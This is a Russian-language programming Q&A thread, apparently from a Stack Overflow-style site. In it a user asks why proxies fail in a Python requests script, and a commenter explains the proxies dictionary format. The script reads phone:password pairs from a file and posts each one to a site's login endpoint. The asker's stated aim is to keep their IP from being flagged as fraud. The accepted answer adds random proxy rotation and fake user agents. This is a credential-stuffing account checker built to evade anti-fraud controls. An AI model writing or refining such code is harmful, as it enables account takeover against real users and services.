# Не работают прокси в скрипте

Tags: python, requests

Скрипт python

```
import requests





file = open('1.txt').read().split('\n')


url = 'https://****.ru/site/loginPopup'
headers = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)     Chrome/90.0.4430.212 Safari/537.36'}

session = requests.Session()
session.headers.update(headers)




for account in file:
    session = requests.Session()
    session.headers.update(headers)
    r = session.get(url)


proxies = {
'http':'195.208.90.112:****:BPM8dHtL:rMYkPkh1',
'https':'195.208.90.112:****:BPM8dHtL:rMYkPkh1',
'http':'195.19.169.56:****:BPM8dHtL:rMYkPkh1',
'https':'195.19.169.56:****:BPM8dHtL:rMYkPkh1',
'http':'195.19.195.7:****:BPM8dHtL:rMYkPkh1',
'https':'195.19.195.7:****:BPM8dHtL:rMYkPkh1',
'http':'195.208.117.187:****:BPM8dHtL:rMYkPkh1',
'https':'195.208.117.187:****:BPM8dHtL:rMYkPkh1',
'http':'195.208.117.101:****:BPM8dHtL:rMYkPkh1',
'https':'195.208.117.101:****:BPM8dHtL:rMYkPkh1',
}

try:

    phone = account.split(":")[0]
    password = account.split(":")[1]

    payload = {
    'login_type': '1',
    'login':phone,
    'password':password,
    'type': 'authorization',
    'fcm_token': "",
    }

    r = session.post(url, data = payload, proxies = proxies, headers = headers)
```

Суть проблемы,без прокси чекает хорошо,но до того как мой айпи не уйдет во фрод. Поставил прокси, таким образом ответ от сайта приходит такой же что и без прокси, делаю вывод,что прокси не работают в данном скрипте,сами прокси рабочие и на сайт с помощью них я зайти могу.

Comment: Фигня какая-то... У вас в итоге в `proxies` будет 2 элемента: http и https - это ведь словарь. В proxies наверняка нужно список заполнить, смотрите в спеке requests как оформлять его. Кроме того, по-моему, в адресе должен быть и протокол, например: `http':'http://195.208.90.112:****:BPM8dHtL:rMYkPkh1'` и `https':'https://195.208.90.112:****:BPM8dHtL:rMYkPkh1'`

Comment: Можете подсказать как из файла прочитать прокси с этим кодом?

Comment: Я ошибся насчет списка в proxies - там именно словарь, где ключ является протоколом: https://requests.readthedocs.io/en/latest/user/advanced/#proxies. Вам нужно самостоятельно менять значения прокси в proxies, если предыдущая прокси не работает. Насчет файла непонятно в чем именно проблема

Comment: нашёл решение,спасибо)

Answer (score 0, accepted):

```
import requests
import random
from fake_useragent import UserAgent






file = open('3.txt').read().split('\n')
proxies = open('proxies.txt').read().split('\n')

ua = UserAgent()


url = 'https://***.ru/site/loginPopup'
headers = {'User-Agent': ua.chrome}





session = requests.Session()
session.headers.update(headers)





for account in file:
    session = requests.Session()
    session.headers.update(headers)
    r = session.get(url)
    proxy = random.choice(proxies)




    try:

        phone = account.split(":")[0]
        password = account.split(":")[1]
    

        payload = {
        'login_type': '1',
        'login':phone,
        'password':password,
        'type': 'authorization',
        'fcm_token': "",
        }

        r = session.post(url, data = payload, proxies = dict(http=proxy, https=proxy), headers = headers)

        print(r.text)
```

В общем мой код теперь выглядит так,берет рандомный прокси из текстовика